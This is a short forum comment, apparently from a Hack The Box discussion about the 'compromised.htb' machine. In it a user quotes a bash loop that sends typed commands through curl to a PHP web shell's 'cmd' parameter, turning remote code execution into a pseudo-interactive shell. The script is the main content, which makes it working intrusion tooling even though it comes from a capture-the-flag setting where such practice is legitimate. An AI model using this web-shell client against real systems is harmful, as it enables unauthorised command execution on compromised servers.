Type your comment> @sparkla said:
Once you got rce, here’s a little script you can use. It’s almost like a real shell
(Your script must support a get param named cmd)#!/bin/bash cmd='' while [[ $cmd != 'exit' ]]; do read -p '$ > ' cmd curl -G http://compromised.htb/findThePathYourself/your-cmd-shell.php --data-urlencode "cmd=$cmd" done
Thank you